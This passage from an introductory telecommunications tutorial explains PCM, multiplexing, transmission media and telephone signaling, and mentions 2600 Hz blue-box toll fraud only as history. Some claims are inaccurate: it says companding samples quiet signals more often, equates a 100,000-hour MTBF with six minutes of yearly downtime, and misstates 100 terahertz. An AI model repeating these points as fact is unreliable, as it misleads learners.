frequency it attains, the reproduced signal will be a highly
accurate reproduction of the original.
The highest frequency used in voice communications is 4000 Hz (4000
cycles per second). Therefore, if a signal is sampled 8000 times per
second, the listener will never know they have been connected and
disconnected 8000 times every second! They will simply recognize the
signal as the voice of the speaker.
To visualize this procedure better, consider how a movie works. Single
still frames are sped past a light and reproduced on a screen. Between
each of the frames is a dark space. Since the frames move so quickly,
the eye does not detect this dark space. Instead the eye perceives
continuous motion from the still frames.
PCM samples can be compared to the still frames of a movie. Since the
voice signal is sampled at such frequent intervals, the listener does
not realize that there are breaks in the voice and good quality
reproduction of voice can be achieved. Naturally, the higher the
sampling rate, the more accurate the reproduction of the signal. Dr.
Nyquist was the one who discovered that only 8000 samples per second are
needed for excellent voice reproduction.
The 8000 samples per second are recorded as a string of voltage levels.
This string is called a Pulse Amplitude Modulation (PAM) signal.
Step 2 - Quantizing
Since analog waves are continuous and have an infinite number of values,
an infinite number of PAM voltage levels are needed to perfectly
describe any analog wave. In practice, it would be impossible to
represent each exact PAM voltage level. Instead, each level is rounded
to the nearest of 256 predetermined voltage levels by a method called
Quantizing.
Quantizing assigns each PAM voltage level to one of 256 amplitude
levels. The amplitude levels do not exactly match the amplitude of the
PAM signal but are close enough so only a little distortion results.
This distortion is called quantizing error. Quantizing error is the
difference between the actual PAM voltage level and the amplitude level
it was rounded to. Quantizing error produces quantizing noise.
Quantizing noise creates an audible noise over the transmission line.
Low amplitude signals are affected more than high amplitude signals by
quantizing noise. To overcome this effect, a process call companding is
employed. Low amplitude signals are sampled more frequently than high
amplitude signals. Therefore, changes in voltage along the waveform
curve can be more accurately distinguished.
Companding reduces the effect of quantizing error on low amplitude
signals where the effect is greatest by increasing the error on high
amplitude signals where the effect is minimal. Throughout this process,
the total number of samples remains the same at 8000 per second.
Two common companding formulas are used in different parts of the world.
The United States and Japan follow a companding formula called Mu-Law.
In Europe and other areas of the world, the formula is slight different
and is called A-Law. Although the two laws differ only slightly, they
are incompatible. Mu-Law hardware cannot be used in conjunction with
A-Law hardware.
Step 3 - Encoding
Encoding converts the 256 possible numeric amplitude voltage levels into
binary 8-bit digital codes. The number 256 was not arrived at
accidentally. The reason there are 256 available amplitude levels is
that an 8-bit code contains 256 (28) possible combinations of 1s and 0s.
These codes are the final product of Pulse Codes Modulation (PCM) and
are ready for digital transmission.
PCM only provides 256 unique pitches and volumes. Every sound that is
heard over a phone is one of these 256 possible sounds.
Digital-Analog Conversion
After the digital bit stream is transmitted, it must be convert back to
an analog waveform to be audible to the human ear. This process is
called Digital-Analog conversion and is essentially the reverse of PCM.
This conversion occurs in three steps.
Step 1 - Decoding
Decoding converts the 8-bit PCM code into PAM voltage levels.
Step 2 - Reconstruction
Reconstruction reads the converted voltage level and reproduces
the original analog wave
Step 3 - Filtering
The decoding process creates unwanted high frequency noise in the
4000 Hz - 8000 Hz range which is audible to the human ear. A
low-pass filter blocks all frequencies above one-half the sampling
rate, eliminating any frequencies above 4000 Hz.
.----------------------.
5 | Digital Transmission |
`----------------------'
Importance of Digital Transmission
Digital transmission is the movement of computer-encoded binary
information from one machine to another. Digital information can
represent voice, text, graphics, and video.
Digital communication is important because we use it everyday. You have
used digital communications if
- your credit card is scanned at the checkout line of a department
store.
- you withdraw money from an automated teller machine.
- you make an international call around the world.
There are a million ways digital communication affects us every day.
As computer technology advances, more and more of our lives are affected
by digital communication. A vast amount of digital information is
transmitted every second of every day. Our bank records, our tax
records, our purchasing records, and so much more is stored as digital
information and transferred whenever and wherever it is needed. It is
no exaggeration to say that digital communications will continue to
change our lives from now on.
Digital Voice Versus Digital Data
The difference between voice and non-voice data is this:
Voice transmission represents voice while data transmission
represents any non-voice information, such as text, graphics, or
video. Both can be transmitted in identical format--as digitized
binary digits
In order to distinguish digital voice binary code from digital data,
since they both look like strings of 1s and 0s, you must know what the
binary codes represent.
This leads us to another important distinction-- that between digital
transmission and data transmission. Although these two terms are often
confused, they are not the same thing.
Digital transmission describes the format of the electrical
signal--1s and 0s as opposed to analog waves.
Data transmission describes the type of information transmitted-
-text, graphics, or video as opposed to voice.
Basic Digital Terminology
A bit is the smallest unit of binary information--a "1" or a "0"
A byte is a "word" of 7 or 8 bits and can represent a unit of
information such as a letter, a digit, a punctuation mark, or a printing
character (such as a line space).
BPS (bits per second) or bit rate refers to the information transfer
rate-- the number of bits transmitted in one second. BPS commonly refers
to a transmission speed.
Example:
A device rated at 19,200 bps can process more information than one
rated at 2,400 bps. As a matter of fact, eight times more. Bps
provides a simple quantifiable means of measuring the amount of
information transferred in one second.
Bits per second is related to throughput. Throughput is the amount of
digital data a machine or system can process. One might say a machine
has a "high throughput," meaning that it can process a lot of information.
Digital Data Transmission
Data communications is made up of three separate parts:
1. Data Terminal Equipment (DTE) is any digital (binary code) device,
such as a computer, a printer, or a digital fax.
2. Data Communications Equipment (DCE) are devices that establish,
maintain, and terminate a connection between a DTE and a facility.
They are used to manipulate the signal to prepare it for
transmission. An example of DCE is a modem.
3. The transmission path is the communication facility linking DCEs
and DTEs.
The Importance of Modems
A pair of modems is required for most DTE-to-DTE transmissions made over
the public network.
The function of a modem is similar to the function of a codec, but in
reverse. Codecs convert information that was originally in analog form
(such as voice) into digital form to transmit it over digital
facilities. Modems do the opposite. They convert digital signals to
analog to transmit them over analog facilities.
It continues to be necessary to convert analog signals to digital and
then back again because the transmission that travels between telephone
company COs is usually over digital facilities. The digital signals
travel from one telephone company Central Office to another over high
capacity digital circuits. Digital transmission is so superior to
analog transmission that it is worth the time and expense of converting
the analog signals to digital signals.
Since computers communicate digitally, and most CO-to-CO facilities are
digital, why then is it necessary to convert computer-generated digital
data signals to analog before transmitting them?
The answer is simple. Most lines from a local Central Office to a
customer's residence or business (called the local loop) are still
analog because for many years, the phone company has been installing
analog lines into homes and businesses. Only very recently have digital
lines begun to terminate at the end user's premises.
It is one thing to convert a telephone company switch from analog to
digital. It is quite another to rewire millions of individual customer
sites, each one requiring on-site technician service. This would
require a massive effort that no institution or even industry could
afford to do all at one time.
In most cases, therefore, we are left with a public network that is part
analog and part digital. We must, therefore, be prepared to convert
analog to digital and digital to analog.
Modulation/Demodulation
To transmit data from one DCE to another, a modem is required when any
portion of the transmitting facility is analog. The modem (modulater/
demodulater) modulates and demodulates digital signals for
transmission over analog lines. Modulation means "changing the
signals." The digital signals are changed to analog, transmitted, and
then changed back to digital at the receiving end.
Modems always come in pairs-- one at the sending end and one at the
receiving end. Their transmission rates vary from 50 bps to 56 Kbps
(Kilobits per second).
Synchronous Versus Asynchronous
There are two ways digital data can be transmitted:
Asynchronous transmission sends data one 8-bit character at a time. For
example, typing on a computer sends data from the keyboard to the
processor of the computer one character at a time. Start and stop bits
attach to the beginning and end of each character to alert the receiving
device of incoming information. In asynchronous transmission, there is
no need for synchronization. The keyboard will send the data to the
processor at the rate the characters are typed. Most modems transmit
asynchronously.
Synchronous transmission is a method of sending large blocks of data at
fixed intervals of time. The two endpoints synchronize their clocking
mechanisms to prepare for transmission. The success of the transmission
depends on precise timing.
Synchronous transmission is preferable when a large amount of data must
be transmitted frequently. It is better suited for batch transmission
because it groups data into large blocks and sends them all at once.
The equipment need for synchronous transmission is more expensive than
for asynchronous transmission so a data traffic study must be made to
determine if the extra cost is justified. Asynchronous transmission is
more cost effective when data communication is light and infrequent.
Error Control
The purpose of error control is to detect and correct errors resulting
from data transmission.
There are several methods of performing error control. What most
methods have in common is the ability to add an error checking series of
bits at the end of a block of data that determines whether the data
arrived correctly. If the data arrived with errors, it will contact the
sending DTE and request the information be re-transmitted. Today's
sophisticated error checking methods are so reliable that, with the
appropriate equipment, it is possible to virtually guarantee that data
transmission will arrive error-free. There are almost no reported cases
of a character error in received faxes.
Error control is much more critical in data communication than in voice
communication because in voice communication, if one or two of the 8000
PCM signals per second arrive with an error, it will make almost no
difference to the quality of the voice representation received. But,
imagine the consequences of a bank making a funds transfer and
misplacing a decimal point on a large account.
.--------------.
6 | Multiplexing |
`--------------'
Function of Multiplexers
Analog and digital signals are carried between a sender and receiver
over transmission facilities. It costs money to transmit information
signals from Point A to Point B. It is, therefore, of prime importance
to budget conscious users to minimize transmission costs.
The primary function of multiplexers is to decrease network facility
line costs.
Multiplexing is a technique that combines many individual signals to
form a single composite signal. This allows the transmission of
multiple simultaneous calls over a single line. It would cost a lot
more money to have individual lines for each telephone than to multiplex
the signals and send them over a single line.
Typical transmission facilities in use today can transmit 24 to 30 calls
over one line. This represents a significant savings for the end user
as well as for commercial long distance and local distance carriers.
Bandwidth
The bandwidth of a transmission medium is a critical factor in
multiplexing. Bandwidth is the difference between the highest and lowest
frequencies in a given range. For example, the frequency range of the
human voice is between 300 Hz and 3300 Hz. Therefore, the voice
bandwidth is
3300 Hz - 300 Hz = 3000 Hz
We also refer to the bandwidth of a transmission medium. A transmission
medium can have a bandwidth of 9600 Hz. This means that it is capable
of transmitting a frequency range up to 9600 Hz. A medium with a large
bandwidth can transmit more information and be divided into more
channels than a medium with a small bandwidth.
We will investigate three different methods of multiplexing:
Frequency Division Multiplexing (FDM)
Time Division Multiplexing (TDM)
Statistical Time Division Multiplexing (STDM)
Frequency Division Multiplexing (FDM)
FDM is the oldest of the three methods of multiplexing. It splits up
the entire bandwidth of the transmission facility into multiple smaller
slices of bandwidth. For example, a facility with a bandwidth of 9600
Hz can be divided into four communications channels of 2400 Hz each.
Four simultaneous telephone conversations can therefore be active on the
same line.
Logically, the sum of the separate transmission rates cannot be more
than the total transmission rate of the transmission facility: the 9600
Hz facility could not be divided into five 2400 Hz channels because 5 x
2400 is greater than 9600.
Guard bands are narrow bandwidths (about 1000 Hz wide) between adjacent
information channels (called frequency banks) which reduce interference
between the channels.
The use of FDM has diminished in recent years, primarily because FDM is
limited to analog transmission, and a growing percentage of transmission
is digital.
Time Division Multiplexing (TDM)
Time division multiplexing has two main advantages over frequency
division multiplexing:
- It is more efficient
- It is capable of transmitting digital signals
Instead of the bandwidth of the facility being divided into frequency
segments, TDM divides the capacity of a transmission facility into short
time intervals called time slots.
TDM is slightly more difficult to conceptualize than FDM. An analogy
helps.
The problem is
We must transport the freight of five companies from New York to
San Francisco. Each company wants their freight to arrive on the
same day. We must be as fair as we can to prevent one company's
freight from arriving before another company's. The freight from
each company will fit into 10 boxcars so a total of 50 boxcars
must be sent. Essentially, there are three different ways we can
accomplish this.
1. We can rent five separate locomotives and rent five
separate railway tracks and send each company's freight on
its own line.
2. We can rent five separate locomotives, but only one track and
send five separate trains along one line.
3. We can join all the boxcars together and connect them to one
engine and send them over a single track.
Obviously the most cost effective solution is Number 3. It saves us
from renting four extra rail lines and four extra locomotives.
To distribute the freight evenly so that each company's freight arrives
at the same time, the could be placed in a pattern as illustrated below:
Company A + Company B + Company C + Company A + Company B + Company C . . .
At San Francisco, the boxcars would be reassembled into the original
groups of 10 for each company and delivered to their final destination.
This is exactly the principle behind TDM. Use one track (communication
channel), and alternate boxcars (pieces of information) from each
sending company (telephone or computer).
In other words, each individual sample of a voice or data conversation
is alternated with samples from different conversations and transmitted
over the same line.
Let's say we have four callers in Boston (1, 2, 3, and 4) who want to
speak with four callers in Seattle (A, B, C, and D). The task is to
transmit four separate voice conversations (the boxcars) over the same
line (the track).
The voice conversations are sampled by PCM. This breaks each
conversation into tiny 8-bit packets. For a brief moment, caller 1
sends a packet to receiver A. Then, caller 2 sends a packet to receiver
B-- and so on. The result is a steady stream of interleaved
packets-- just like our train example except the boxcars stretch all
across the country. Notice that every fourth packet is from the same
conversation. At the receiving end, the packets are reassembled and
sent to the appropriate receiver at the rate of 8000 samples per
seconds.
Remember that if the receiver hears the samples at the rate of 8000
times per second, it will result in good quality voice reproduction.
Therefore, the packets are transmitted fast enough so that every 1/8000
of a second, a packet from each send arrives at the appropriate
receiver. In other words, each conversation is connected 8000 times per
second-- enough to satisfy Nyquist's Theorem.
In FDM the circuit was divided into individual frequency channels for
use by each sender. In contrast, TDM divides the circuit into
individual time channels. For a brief moment, each sender is allocated
the entire bandwidth-- just enough time to send eight bits of
information.
TDM Time Slots
Because a version of the TDM process (called STDM) is the primary
switching technique in use today, it is important that this challenging
concept be presented as clearly and understandably as possible. Here is
a closer look at TDM, emphasizing the "T"--which stands for time.
Each transmitting device is allocated a time slot during which it is
permitted to transmit. If there are three transmitting devices, for
example, there will be three time slots. If there are four devices
there will be four time slots.
Two devices, one transmitting and one receiving, are interconnected by
assigning them to the same time slot of a circuit. This means that
during their momentary shared time slot, the transmitting device is able
to send a short burst of information (usually eight bits) to the
receiving device. During their time slot, they use the entire bandwidth
of the transmission facility but only for a short period of time. Then,
in sequence, the following transmitting devices are allocated time slots
during which they too use the whole bandwidth.
Clock A and Clock B at either end of the transmission must move
synchronously. They rotate in unison, each momentarily making contact
with the two synchronized devices (one sender and one receiver). For
precisely the same moment, Clock A will be in contact with Sender 1 and
Clock B will be in contact with Receiver 1, allowing one sample (8 bits)
of information to pass through. The they will both rotate so that clock
A comes into contact with Sender 2 and Clock B with Receiver 2. Again,
one sample of information will pass. This process is repeated for as
long as needed.
How fast must the clocking mechanism rotate? Again, the answer is
Nyquist's theorem. If a signal is sampled 8000 times per second, an
accurate representation of voice will result at the receiving end. The
same theory applies with TDM. If the clocking mechanism rotates 8000
times per second, the rate of transfer from each sender and receiver
must also be 8000 times per second. This is so because every revolution
of the two clocking mechanisms result in each input and output device
making contact once. TDM will not work if the clocking mechanism
synchronization is off.
Each group of bits from one rotation of the clocking mechanism is called
a frame. One method for maintaining synchronization is inserting a frame
bit at the end of each frame. The frame bit alerts the demultiplexer of
the end of a frame.
Statistical Time Division Multiplexing (STDM)
STDM is an advanced form of TDM and is the primary switching technique
is use now. The drawback of the TDM process is that if a device is not
currently transmitting, its time slot is left unused and is therefore
wasted.
In contrast, is STDM, carrying capacity is assigned dynamically. If a
device is not transmitting, its time slot can be used by the other
devices, speeding up their transmission. In other words, a time slot is
assigned to a device only if it has information to send. STDM
eliminates wasted carrying capacity.
.--------------------.
7 | Transmission Media |
`--------------------'
Voice and data information is represented by waveforms and transmitted
to a distant receiver. However, information does not just magically
route itself from Point A to Point B. It must follow some predetermined
path. This path is called a transmission medium, or sometimes a
transmission facility.
The type of transmission medium selected to join a sender and receiver
can have a huge effect on the quality, price, and success of a
transmission. Choosing the wrong medium can make the difference between
an efficient transmission and an inefficient transmission.
Efficient means choosing the most appropriate medium for a given
transmission. For example, the most efficient medium for transmitting a
normal call from your home to your neighbor is probably a simple pair of
copper wires. It is inexpensive and it gets the job done. But if we
were to transmit 2-way video teleconferencing from Bombay to Burbank,
one pair of wires might be the least efficient medium and get us into a
lot of trouble.
A company may buy all the right equipment and understand all the
fundamentals, but if they transmit over an inappropriate medium, they
would probably be better off delivering handwritten messages than trying
to use the phone.
There are a number of characteristics that determine the appropriateness
of each medium for particular applications:
- cost
- ease of installation
- capacity
- rate of error
In choosing a transmission medium, these and many other factors must be
taken into consideration.
Terminology
The transmission media used in telecommunications can be divided into
two major categories: conducted and radiated. Examples of conducted
media include copper wire, coaxial cable, and fiber optics. Radiated
media include microwave and satellite.
A circuit is a path over which information travels. All of the five
media serve as circuits to connect two or more devices.
A channel is a communication path within a circuit. A circuit can
contain one or more channels. Multiplexing divides one physical link
(circuit) into several communications paths (channels).
The bandwidth of a circuit is the range of frequencies it can carry.
The greater the range of frequencies, the more information can be
transmitted. Some transmission media have a greater bandwidth than
others and are therefore able to carry more traffic.
The bandwidth of a circuit is directly related to its capacity to carry
information.
Capacity is the amount of information that may pass through a circuit in
a given amount of time. A high capacity circuit has a large amount of
bandwidth-- a high range of frequencies-- and can therefore transmit a
lot of information.
Copper Cable
Copper cable has historically been the most common medium. It has been
around for many years and today is most prevalent in the local loop--the
connection between a residence or business and the local telephone
company.
Copper cables are typically insulated and twisted in pairs to minimize
interference and signal distortion between adjacent pairs. Twisting the
wires into pairs results in better quality sound which is able to travel
a greater distance.
Shielded twisted pair is copper cable specially insulated to reduce the
high error rate associated with copper transmission by significantly
reducing attenuation and noise.
Copper cable transmission requires signal amplification approximately
every 1800 meters due to attenuation.
Advantages of Copper Cable
There is plenty of it and its price is relatively low.
Installation of copper cable is relatively easy and inexpensive.
Disadvantages of Copper Cable
Copper has a high error rate.
Copper cable is more susceptible to electromagnetic interference (EMI) and
radio frequency interference (RFI) than other media. These effects can
produce noise and interfere with transmission.
Copper cable has limited bandwidth and limited transmission capacity.
The frequency spectrum range (bandwidth) of copper cable is relatively low
-- approximately one megahertz (one million Hz). Copper circuits can be
divided into fewer channels and carry less information than the other media.
Typical Applications of Copper Cable
Residential lines from homes to the local CO (called the local loop).
Lines from business telephone stations to an internal PBX.
Coaxial Cable
Coaxial cable was developed to provide a more effective way to isolate
wires from outside influence, as well as offering greater capacity and
bandwidth than copper cable.
Coaxial cable is composed of a central conductor wire surrounded by
insulation, a shielding layer and an outer jacket.
Coaxial cable requires signal amplification approximately every 2000
meters.
Advantages of Coaxial Cable
Coaxial cable has higher bandwidth and greater channel capacity than
copper wire. It can transmit more information over more channels than
copper can.
Coaxial cable has lower error rates. Because of its greater insulation,
coaxial is less affected by distortion, noise, crosstalk (conversations
from adjacent lines), and other signal impairments.
Coaxial cable has larger spacing between amplifiers.
Disadvantages of Coaxial Cable
Coaxial cable has high installation costs. It is thicker and
less flexible and is more difficult to work with than copper wire.
Coaxial cable is more expensive per foot than copper cable.
Typical Applications
- Data networks
- Long distance networks
- CO-to-CO connections
Microwave
For transmission by microwave, electrical or light signals must be
transformed into high-frequency radio waves. Microwave radio transmits
at the high end of the frequency spectrum --between one gigahertz (one
billion Hz) and 30 GHz.
Signals are transmitted through the atmosphere by directly aiming one
dish at another. A clear line-of-sight must exist between the
transmitting and receiving dishes because microwave travels in a
straight line. Due to the curvature of the earth, microwave stations
are spaced between 30 and 60 kilometers apart.
To compensate for attenuation, each tower is equipped with amplifiers
(for analog transmission) or repeaters (for digital transmission) to
boost the signal.
Before the introduction of fiber optic cable in 1984, microwave served
as the primary alternative to coaxial cable for the public telephone
companies.
Advantages of Microwave
Microwave has high capacity. Microwave transmission offers greater
bandwidth than copper or coaxial cable resulting in higher transmission
rates and more voice channels.
Microwave has low error rates.
Microwave systems can be installed and taken down quickly and inexpensively.
They can be efficiently allocated to the point of greatest need in a
network. Microwave is often used in rural areas because the microwave
dishes can be loaded on trucks, moved to the desired location, and
installed quickly.
Microwave requires very little power to send signals from dish to dish
because transmission does not spread out into the atmosphere. Instead
it travels along a straight path toward the next tower.
Microwave has a low Mean Time Between Failures (MTBF) of 100,000
hours-- or only six minutes of down time per year.
Microwave is good for bypassing inconvenient terrain such as mountains
and bodies of water.
Disadvantages of Microwave
Microwave is susceptible to environmental distortions. Factors such as
rain, snow, and heat can cause the microwave beam to bend and vary.
This affects signal quality.
Microwave dishes must be focused in a straight line-of-sight. This can
present a problem over certain terrain or in congested cities.
Temporary physical line-of-sight interruptions, such as a bird or plane
flying through the signal pathway, can result in a disruption of
signals.
Microwave usage must be registered with appropriate regulatory agencies.
These agencies monitor and allocate frequency assignments to prevent
systems from interfering with each other.
Extensive use of microwave in many busy metropolitan areas has filled up
the airwaves, limiting the availability of frequencies.
Typical Applications
- Private networks
- Long distance networks
Satellite
Satellite communication is a fast growing segment of the
telecommunications market because it provides reliable, high capacity
circuits.
In most respects, satellite communication is similar to microwave
communication. Both use the same very high frequency (VHF) radio waves
and both require line-of-sight transmission. A satellite performs
essentially the same function as a microwave tower.
However, satellites are positioned 36,000 kilometers above the earth in
a geosynchronous orbit, This means they remain stationary relative to a
given position on the surface of earth.
Another difference between microwave and satellite communications is
their transmission signal methods. Microwave uses only one frequency to
send and receive messages. Satellites use two different
frequencies--one for the uplink and one for the downlink.
A device called a transponder is carried onboard the satellite. It
receives an uplink signal beam from a terrestrial microwave dish,
amplifies (analog) or regenerates (digital) the signal, then retransmits
a downlink signal beam to the destination microwave dish on the earth.
Today's satellites have up to 48 transponders, each with a capacity
greater than 100 Mbps.
Because of the long distance traveled, there is a propagation delay of
1/2 second inherent in satellite communication. Propagation delay is
noticeable in phone conversations and can be disastrous to data
communication.
A unique advantage of satellite communication is that transmission cost
is not distance sensitive. It costs the same to send a message across
the street as around the world.
Another unique characteristic is the ability to provide
point-to-multipoint transmission. The area of the surface of the earth
where the downlinked satellite signals can be received is called its
footprint. Information uplinked from the earth can be broadcast and
retransmitted to any number of receiving dishes within the satellite's
footprint. Television broadcast is a common application of
point-to-multipoint transmission.
Advantages of Satellite Transmission
Satellite transmission provides access to wide geographical areas (up to the
size of the satellite's footprint), point-to-multipoint broadcasting, a large
bandwidth, and is very reliable.
Disadvantages of Satellite Transmission
Problems associated with satellite transmission include: propagation delay,
licensing requirement by regulatory agencies security issue concerning the
broadcast nature of satellite transmission. Undesired parties within a
satellites footprint may illicitly receive downlink transmission.
Installation requires a satellite in orbit.
Fiber Optics
Fiber optics is the most recently developed transmission medium. It
represents an enormous step forward in transmission capacity. A recent
test reported transmission rates of 350 Gbps (350 billion bits), enough
bandwidth to support millions of voice calls. Furthermore, a recently
performed record- setting experiment transmitted signals 10,000 Km
without the use of repeaters, although in practice 80 to 300 Km is the
norm. Recall the need for repeaters every kilometer or so with copper
wire and coaxial.
Fiber optics communication uses the frequencies of light to send
signals. A device called a modulator converts electrical analog or
digital signals into light pulses. A light source pulses light on and
off billions and even trillions of times per second (similar to a
flashlight turned on and off-- only faster). These pulses of light are
translated into binary code. The positive light pulse represents 1; a
negative light pulse (no light) represents 0. Fiber optics is digital
in nature.
The light is then transmitted along a glass or plastic fiber about the
size of a human hair. At the receiving end, the light pulses are
detected and converted back to electrical signals by photoelectric
diodes.
Advantages of Fiber Optics
Fiber optics has an extremely high bandwidth. In fact, fiber optic
bandwidth is almost infinite, limited only by the ability of engineers
to increase the frequency of the pulses of light. Current technology
achieves a frequency of 100 terahertz (one million billion).
Fiber optics is not subject to interference or electromagnetic
impairments as are the other media.
Fiber optics has an extremely low error rate-- approximately one error
per 1,000,000,000,000.
Fiber optics has a low energy loss translating into fewer
repeaters/regenerators per long distance transmission.
Fiber is a glass and glass is made of sand. There will never by a
shortage of raw material for fiber.
Disadvantages of Fiber Optics
Installation costs are high for a fiber optic system. Currently it
costs approximately $41,000 per km to install a fiber optic system. The
expense of laying fiber is primarily due to the high cost of splicing
and joining fiber. The cost will almost certainly decrease dramatically
as less expensive methods of splicing and joining fiber are introduced.
A potential disadvantage of fiber optics results from its enormous
carrying capacity. Occasionally a farmer or construction worker will
dig into the earth and unintentionally split a fiber optic cable.
Because the cable can carry so much information, an entire city could
lose its telephone communication from just one minor mishap.
.-----------.
8 | Signaling |
`-----------'
Types of Signals
When a subscriber picks up the phone to place a call, he dials digits to
signal the network. The dialed digits request a circuit and tell the
network where to route the call--a simple enough procedure for the
caller. But in fact, it involves a highly sophisticated maze of
signaling to and from switches and phones to route and monitor the call.
Signaling functions can be divided into three main categories.
Supervisory
Supervisory signals indicate to the party being called and the CO
the status of lines and trunks--whether they are idle, busy, or
requesting service. The signals detect and initiate service on
requesting lines and trunks. Signals are activated by changes in
electrical state and are caused by events such as a telephone
going on-hook or off-hook. Their second function is to process
requests for telephone features such as call waiting.
Addressing
Addressing signals determine the destination of a call. They
transmit routing information throughout the network. Two of the
most important are
Dial Pulse: These address signals are generated by alternately
opening and closing a contact in a rotary phone
through which direct current flows. The number of
pulses corresponds to the number of the dialed
digit.
Tone: These address signals send a unique tone or
combination of tones which correspond to the
dialed digit.
Alerting
Alerting signals inform the subscriber of call processing
conditions.. These signals include:
Dial tone
The phone ringing
Flashing lights that substitute for phone ringing
Busy signal
Let's take a look at how signaling is used to set up a typical call over
the public network.
Step 1 - Caller A goes off-hook
Step 2 - The CO detects a change in state in the subscriber's line.
The CO responds by sending an alerting signal (dial tone) to
caller A to announce that dialing may begin. The CO marks
the calling line busy so that other subscribers can not call
into it. If another subscriber attempts to phone caller A,
he will get the alerting busy signal. Caller A dials the
digits using tones from the keypad or dial pulses from a
rotary phone.
Step 3 - The dialed digits are sent as addressing signals from caller
A to CO A
Step 4 - CO A routes the addressing signals to CO B.
Step 5 - Supervisory signals in CO B test caller B to determine if the
line is free. The line is determined to be free.
Step 6 - CO B sends alerting signals to caller B, which causes caller
B's telephone to ring.
This is an example of a local call which was not billed to the customer.
If the call had been a billable, long distance call, it would have used
a supervisory signal known as answer supervision. When the receiving
end of a long distance call picks up, it sends a signal to its local CO.
The CO then sends an answer supervision signal to the caller's CO
telling it that the phone was picked up and it is time to begin billing.
Where on the Circuit Does Signaling Occur?
There are only three places where signaling can occur:
In-band means on the same circuit as voice, within the voice
frequency range (between 300 and 3400 Hz).
Out-of-band means on the same circuit as voice, outside of the
voice frequency range (3400 - 3700 Hz).
Common Channel Signaling (CCS) means signaling occurs on a
completely separate circuit.
The frequency range of human voice is approximately 0 - 4000 Hz.
However, most voice signals fall in the area between 300 and 3400 Hz.
Therefore, to save bandwidth, telephones only recognize signals between
300 and 3400 Hz. It is conceivable that someone with an extremely high
voice would have difficulty communicating over the telephone.
In-band and Out-of-band
In-band signaling (300 to 3400 Hz) can take the form of either a single
frequency tone (SF signaling) of a combination of tones (Dual Tone
Multifrequency - DTMF). DTMF is the familiar touch tone.
Out-of-band signaling (3400 to 3700 Hz) is always single frequency
(SF).
In other words, using the frequency range from 300 to 3700 Hz, there are
three methods of signaling.
Method A: In-band (300 to 3400 Hz) by a single frequency
(SF)
Method B: In-band (300 to 3400 Hz) by multifrequencies
(DTMF)
Method C: Out-of-band (3400 to 3700 Hz) by a single
frequency (SF)
Single Frequency (SF) Signaling
Methods A and C are examples of Single Frequency (SF) signaling. SF
signaling is used to determine if the phone line is busy (supervision)
and to convey dial pulses (addressing).
Method A: In-band SF signaling uses a 2600 Hz tone which is carried
over the frequency bandwidth of voice (remember the frequency
bandwidth of voice is between 300 and 3300 Hz), within the
speech path. So as not to interfere with speech, it is
present before the call but is removed once the circuit is
seized and speech begins. After the conversation is over, it
may resume signaling. It does not, however, signal during
the call because it would interfere with voice which also may
transmit at 2600 Hz. Special equipment prevents occasional
2600 Hz speech frequencies from accidentally setting off
signals.
Method C: To improve signaling performance, SF out-of-band signaling
was developed. It uses frequencies above the voice frequency
range (within the 3400 to 3700 Hz bandwidth) to transmit
signals.
The problem with Methods A and C is that they are easily susceptible to
fraud. In the late 1960s, one of the most popular breakfast cereals in
America had a promotion in which they packaged millions of children's
whistles, one in each specially marked box. Never did General Mills,
the producer of the cereal, anticipate the fraud they would be party to.
It turned out that the whistles emitted a pure 2600 Hz tone, exactly the
tone used in Method A. It did not take long for hackers to discover
that if they blew the whistles into the phones while making a long
distance phone call, it tricked the telephone company billing equipment
and no charge was made.
This trick grew into its own little cottage industry, culminating in the
infamous mass produced Blue Boxes which played tones that fooled
telephone billing equipment out of millions of dollars.
Method B: DTMF was introduced to overcome this fraud, as well as to
provide better signaling service to the customer. Instead of
producing just one signaling frequency, DTMF transmits
numerical address information from a phone by sending a
combination of two frequencies, one high and one low, to
represent each number/letter and * and # on the dial pad.
The usable tones are located in the center of the voice
communication frequencies to minimize the effects of
distortion.
Drawbacks to SF and DTMF Signaling
There are drawbacks to both SF and DTMF signaling that are promoting
their replacement in long distance toll circuits. The most important is
that these signals consume time on the circuit while producing no
revenues. Every electrical impulse, be it a voice conversation or
signaling information, consumes circuit time. Voice conversations are
billable. Signaling is not. Therefore, it is in the best interest of
the phone carriers to minimize signaling.
Unfortunately, almost half of all toll calls are not completed because
the called party is busy, not available or because of CO blockage.
Nevertheless, signals must be generated to attempt to set up, then take
down the call. Signals are generated but no revenue is produced. For
incompleted calls, these signals compete with revenue producing signals
(whose calls were completed) for scarce circuit resources.
CCS introduced several benefits to the public network:
. Signaling information was removed from the voice channel, so
control information could travel at the same time as voice
without taking up valuable bandwidth from the voice channel.
. CCS sets up calls faster, reducing signaling time and freeing
up scarce resources.
. It cost less than conventional signaling.
. It improves network performance.
. It reduces fraud.
Signaling System 7 (SS7)
Today the major long distance carriers use a version of CCS called
Signaling System 7 (SS7). It is a standard protocol developed by the
CCITT, a body which establishes international standards.
Common Channel Signaling (CCS)
Common Channel Signaling (CCS) is a radical departure from traditional
signaling methods. It transmits signals over a completely different
circuit than the voice information. The signals from hundreds or
thousands of voice conversations are carried over a single common
channel.
Introduced in the mid-1970s CCS uses a separate signaling network to
transmit call setup, billing, and supervisory information. Instead of
sending signals over the same communication paths as voice or data, CCS
employs a full network dedicated to signaling alone.
Loop Start Versus Ground Start Signaling
Establishing an electrical current connection with a CO can be done in
several different ways. Here are a few of the possibilities
Loop Start
Inside of the CO, there is a powerful, central battery that provides
current to all subscribers. Loop start is a method of establishing the
flow of current from the CO to a subscriber's phone.
The two main components of a loop start configuration are
The tip (also called the A line) is the portion of the line loop
between the CO and the subscriber's phone that is connected to the
positive, grounded side of the battery.
The ring (also called the B line) is the portion of the line loop
between the CO and the subscriber's phone that is connected to the
negative, ungrounded side of the battery.
To establish a loop start connection with the CO, a subscriber goes
off-hook. This closes a direct current (DC) path between the tip and
ring and allows the current to flow in a loop from the CO battery to the
subscriber and back to the battery. Once the current is flowing, the CO
is capable of sending alerting signals (dial tone) to the subscriber to
begin a connection.
The problem with loop start signaling is a phenomenon called glare that
occurs in trunks between a CO and a PBX. When a call comes into a PBX
from CO trunk, the only way the PBX knows that the trunk circuit is busy
is the ringing signal sent from the CO.
Unfortunately the ringing signal is transmitted at six second intervals.
For up to six seconds at a time, the PBX does not know there is a call
on that circuit. If an internal PBX caller wishes to make an outgoing
call, the PBX may seize the busy trunk call at the same time. The
result is confused users on either end of the line, and the abandonment
of both calls.
Ground Start
Ground start signaling overcomes glare by immediately engaging a circuit
seize signal on the busy trunk. The signal alerts the PBX that the
circuit is occupied with an incoming call and cannot be used for an
outgoing call.
